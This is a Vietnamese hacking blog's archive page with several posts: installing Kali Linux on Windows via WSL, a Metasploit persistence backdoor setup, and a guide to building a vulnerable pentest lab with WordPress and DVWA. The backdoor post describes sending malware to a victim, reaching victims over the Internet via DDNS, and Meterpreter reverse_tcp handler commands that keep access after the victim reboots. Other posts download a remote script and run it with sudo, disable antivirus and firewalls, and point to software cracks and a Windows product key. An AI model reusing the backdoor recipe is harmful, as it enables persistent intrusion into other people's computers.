Showing posts with label KaliLinux. Show all posts
Showing posts with label KaliLinux. Show all posts

Monday, March 19, 2018

Chia sẻ một số lệnh Meterpreter cơ bản trên Metasploit

Nguồn tài liệu:
Security365 http://security365.vn
Free Security Course - Hacker Mũ Xám http://hackermuxam.edu.vn / Security365










Friday, March 9, 2018

Hướng dẫn cài đặt Kali Linux chạy trực tiếp trên Windows 10


Lưu ý:

  1. Phải là bản Windows Insider. Build 17025 trở lên mới làm được. Người dùng chính thức có thể có vào tháng 3-4 qua bản cập nhật Spring Creator Update
  2. Nhớ tắt hết diệt Virus, Firewall đi nhé
  3. Bản Kali này chưa được cài sẵn Tool

B1: Mở PowerShell (Admin) gõ Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
Khi được hỏi chọn Y, Enter để máy khởi động lại
B2: Mở trình duyệt lên. Truy cập: https://www.microsoft.com/en-us/store/p/kali-linux/9pkr34tncv07
B3: Windows Store sẽ tự động bật ra. Tải về máy
B4: Cài giao diện cho Linux
Mở CMD quyền Admin
Kali -> Enter
apt-get update
apt-get install wget -y
wget https://kali.sh/xfce4.sh
Nếu báo lỗi thì gõ wget http://kali.sh/xfce4.sh
sudo chmod a+x xfce4.sh
sudo ./xfce4.sh
sudo service xrdp start
B5: Mở Remote Desktop kết nối tới 127.0.0.1:3390

Video Tutorial


Sunday, February 11, 2018

Chạy Terminal Kali Linux trực tiếp trên Window không thông qua máy ảo


Kali linux trên môi trường WSL 

Kali linux luôn hướng về môi trường mới để chạy Kali, trước là Android và giờ với sự gia đời Windows Subsystem for Linux (WSL) trong Windows 10, các khả năng mới và thú vị đã xuất hiện. Nói cho cùng, nếu WSL có thể hỗ trợ Ubuntu thì chắc chắn cũng phải hỗ trợ một nhân Debian khác như Kali linux. Điều này đặc biệt đúng với Windows Subsystem for Linux Distribution Switcher.


Kali trên Window, đây có phải một điều điên rồ

Mặc dù thiết lập của Kali trên Windows không phải là tối ưu nhất do các hạn chế môi trường khác nhau, nhưng vẫn có nhiều tình huống khi có Kali Linux trên Windows của bạn có thể có lợi. Một ví dụ mà nói đến tâm là hợp nhất các không gian làm việc, đặc biệt nếu Windows là môi trường làm việc chính của bạn. Ví dụ dưới đây là một màn hình chạy Metasploit Framework từ Kali Linux trên môi trường WSL.


Thiết lập môi trường

1. Cập nhật Windows của bạn.Bật tính năng Microsoft Windows Subsystem for Linux, sẽ có một yêu cầu khởi động lại khi hoàn tất

Mở control panel, vào mục Programs > Turn Windows features on or off

Tích vào ô Microsoft Windows Subsystem for Linux

Chờ máy chạy xong rồi xác nhận khởi động lại.


2. Tải thêm các công cụ cần thiết

Các bạn tải và cài đặt python

Ở màn hình cài đặt python chọn Customize Installation > Next > tích ô Add Python to enviroment variables rồi install

Sau đó các bạn cài đặt Git

Lưu ý tắt tính năng Git Credential Manager 


3. Cài đặt môi trường Ubuntu là mặc định, điều này cực kì quan trọng cho Kali.

Truy cập CMD

lxrun /install

Hiện ra dòng press "y" to continute thì các bạn cứ nhập y, sau đó nhập tên đăng nhập và mật khẩu cho UNIX mới tạo.







4. Thiết lập và cài đặt WSL Switcher, tải Kali base và giải nén nó vào ổ cứng:

git clone https://github.com/RoliSoft/WSL-Distribution-Switcher.git
cd WSL-Distribution-Switcher
python get-prebuilt.py kalilinux/kali-linux-docker
python install.py rootfs_kalilinux_kali-linux-docker_latest.tar.gz
lxrun /setdefaultuser root

5. Bây giờ Kali được thiết lập trên máy Windows, bạn có thể sử dụng nó bằng cách chạy lệnh "bash":

bash 


6. Update và Upgrade Kali Linux

export LANG=C && cd
cat /etc/issue
echo nameserver 8.8.8.8 > /etc/resolv.conf
apt-get update
apt-get dist-upgrade

Bài viết dựa trên bài viết Kali on the Windows Subsystem for Linux của muts 

Friday, February 9, 2018

Thiết lập backdoor Metasploit tự động khởi động cùng Windows


Một số lưu ý:
- Khi tấn công ngoài mạng LAN, để hứng được kết nối trở lại, cần sử dụng 1 dịch vụ DDNS như noip.com và nhớ chạy noip để nó tự động Update địa chỉ IP của máy Hacker
- Trong bài này DEMO với Port 4444 và 4567, thì tất cả các port này đều phải được mở trên modem khi tấn công ngoài Internet

Sau khi tạo mã độc và gửi đi, chúng ta thiết lập trên Metasploit như sau
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp (Nếu là Android thì đổi đi)
set LHOST 192.168.1.3
set LPORT 4444
set ExitOnSession False
set AutoRunScript exploits/windows/local/persistence LPORT=4567
exploit -j -z

Trong đó 4567 là port mà victim sẽ kết nối trả về. Trong trường hợp phiên Meterpreter bị Die do bất kì lí do nào (Chẳng hạn victim khởi động lại). Chúng ta sẽ thiết lập Metasploit lắng nghe tại cổng 4567 và chắc chắn sẽ hứng được kết nối từ victim khi khởi động lại
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp (Nếu là Android thì đổi đi)
set LHOST 192.168.1.3
set LPORT 4567
exploit -j
Video Demo


Monday, January 1, 2018

Tài liệu hướng dẫn cài đặt máy ảo Windows làm Lab thực hành Pentest Phần 2

=>> Phần 1: Xem tại đây

G. Cài đặt OwnCloud

Bước 1: Tải về mã nguồn OwnCloud tại địa chỉ sau đây: Download
Bước 2: Xả nén toàn bộ mã nguồn vào C:\wamp\www\owncloud


Bước 3: Truy cập localhost/phpmyadmin/ và tạo 1 database như hình



Bước 3: Mở trình duyệt lên và truy cập http://localhost/owncloud/. Thiết lập như hình


Bước 4: OK vậy là xong


H. Thiết lập hệ thống

1. Crack hoặc Active bản quyền: Các bạn có thể xài key hoặc xài Reloader Activator
2. Tắt AutoUpdate. Tắt Firewall. Tắt UAC




3. Cấu hình IP tĩnh, nếu cần


I. Sao lưu

Bước 1: Xóa hết các file rác đi để cho máy ảo gọn gàng nhất
Bước 2: 
Cách 1
Mở Folder lưu máy ảo ra. Nén lại và backup ra 1 nơi an toàn, file sau backup sẽ có dung lượng tầm hơn 4GB.
Khi cần thì xả nén ra, nhấp đúp file .vmx là nó sẽ tự add lại vào Vmware
Cách 2
Tạo 1 Snapshot cho nó để khi cần là có thể roll back về ngay mà không phải xả nén, tuy nhiên vẫn khuyến khích backup theo Cách 1. Để sau này có bị mất folder máy ảo thì vẫn restore lại được


Khi cần Restore về thì chọn Revert to Snapshot

Sunday, December 31, 2017

Tài liệu hướng dẫn cài đặt máy ảo Windows làm Lab thực hành Pentest Phần 1

A. Chuẩn bị:

- Phần mềm tạo máy ảo VMWare Workstation 14: Download + Key
- File ISO Windows 7 Ultimate x64. Download tại đây: Link Fshare

B. Thiết lập máy ảo

Bước 1: Tại giao diện chính của Vmware bấm phím Ctrl+N để tạo 1 máy ảo mới. Ở cửa sổ ban đầu chọn Typical

Bước 2: Nạp đĩa ISO cài Windows 7 vào

Bước 3: Do đây mình xài đĩa Windows AIO nên có thể có mục lựa chọn Windows để cài đặt
Mục Product Key nhập D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV
Thiết lập User/Pass theo ý bạn

Bước 4: Chọn nơi lưu máy ảo


Bước 5: Chọn Store Vitural Disk as single file. Còn mục dung lượng để 60GB là ổn


Bước 6: Click Customize Hardware


Bước 7: Ở mục Memory chỉnh lại lượng RAM sẽ cấp cho máy ảo. Lượng RAM cấp cho máy ảo không nên vượt quá 1/2 lượng RAM của máy thật


Thiết lập lại cấu hình mạng như hình


Bước 8: Cuối cùng nhấn Finish và cài đặt Windows 7 như một máy thật

C. Cài đặt VMWare Tools:

- Bạn vào VM-> Install VMWare Tool và làm theo hướng dẫn. Cài xong khởi động lại máy

D. Cài Wamp Server.

- Download Full C++ tại đây: 
- Link tải C++ 32bit: Download
- Link tải C++ 64bit: Download
- Download WINRAR: Download Crack
- Download Wamp Server: Download

Bước 1: Cài đặt lần lượt tất cả các file trong bộ C++ bạn đã tải về (Tùy theo hệ điều hành bạn cài). Lưu ý có bản 2015 nhưng không cần cài



Bước 2: Chạy file cài đặt WampServer và làm theo hướng dẫn


Bước 3: Sau khi cài đặt xong. Nhấp đúp icon Wamp Server để khởi chạy và đảm bảo icon của nó ở system tray đã đổi thành màu xanh


E. Cài đặt WordPress

Bước 1: Tải về mã nguồn WordPress tại địa chỉ này: Download
Bước 2: Xả nén toàn bộ mã nguồn vào thư mục C:\wamp\www\wordpress

Bước 3: Mở 1 trình duyệt (Cài trong máy ảo lên) và truy cập localhost://phpmyadmin
Username: root | Password bỏ trắng


Bước 4: Click User Account  -> Add new


Bước 5: Thiết lập như hình. Sau đó click Go


Bước 6: Truy cập localhost/wordpress/ . Chọn Tiếng Việt


Bước 7: Cung cấp thông tin như hình, password là cái pass bạn đặt ở Bước 5 


Bước 8: Tiếp tục thiết lập tài khoản quản trị


Bước 9: Cuối cùng truy cập localhost/wordpress/wp-admin và login với thông tin bạn tạo ở bước 8


Bước 10: Tải Plugin: website-contact-form-with-file-upload.1.3.4 tại đây: Download
Truy cập Gói mở rộng -> Cài mới -> Tải Plugin lên


Bước 11: Click kích hoạt Plugin


Tới đây là xong, lưu ý: Tuyệt đối không update Plugin này lên bản mới
Địa chỉ trang wordpress của bạn localhost/wordpress

F. Cài đặt Damn Vulnerable Web Application (DVWA)

Bước 1: Tải mã nguồn mới nhất tại: Download
Bước 2: Xả nén mã nguồn vào thư mục C:\wamp\www\dvwa


Bước 3: Mở Folder Config. Đổi tên file config.inc.php.dist thành config.inc.php . Sau đó mở file đóa ra bằng Notepad. Sửa như sau
1. Sửa dòng $_DVWA[ 'db_password' ] = 'p@ssw0rd'; thành $_DVWA[ 'db_password' ] = '';


2. Truy cập https://www.google.com/recaptcha/admin#list Đăng nhập tài khoản Google và thiết lập như sau


Click Register và ở đoạn Adding reCAPTCHA to your site nó sẽ cho mình 2 thông tin


Tiếp tục sửa file cấu hình thành
$_DVWA[ 'recaptcha_public_key' ]  = 'Key màu xanh ở ô Site key';
$_DVWA[ 'recaptcha_private_key' ] = 'Key màu xanh ở ô Secret key';



Bước 4: Mở Folder C:\wamp\bin\apache\apache2.4.27\bin mở file php.ini bằng notepad sau đó sửa dòng allow_url_include = Off thành allow_url_include = On

Phải chuột vào icon WampServer chọn Refresh và chờ nó đổi sang màu xanh trở lại



Bước 5: Truy cập http://localhost/phpmyadmin/index.php . Click New -> Đặt tên là dvwa. Cấu hình như hình sau đó bấm Create


Bước 6: Cuối cùng truy cập http://localhost/dvwa/setup.php kiểm tra nếu thấy tất cả những thứ trong vùng khoanh đỏ đều là màu xanh thì bấm Create/Reset Database là xong


Bước 7: Truy cập: http://localhost/dvwa/login.php và login với user: admin | password: password


G. Cấu hình nâng cao và cấu hình bổ sung: Xem phần 2

Bài viết được giữ bản quyền bởi Linux Team Việt Nam.